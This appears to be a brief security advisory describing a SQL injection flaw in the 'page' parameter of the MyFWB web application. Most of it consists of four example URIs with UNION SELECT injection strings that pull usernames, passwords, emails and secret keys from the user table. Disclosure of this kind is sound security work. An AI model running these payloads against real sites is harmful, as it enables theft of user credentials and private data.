|
|
MyFWB Page Variable SQL Injection Vulnerability
Attackers can exploit this issue via a browser. The following example URIs are available: Username: http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user Password: http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user Email: http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user Secret Key: http://www.example.com/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user |
|
Privacy Statement |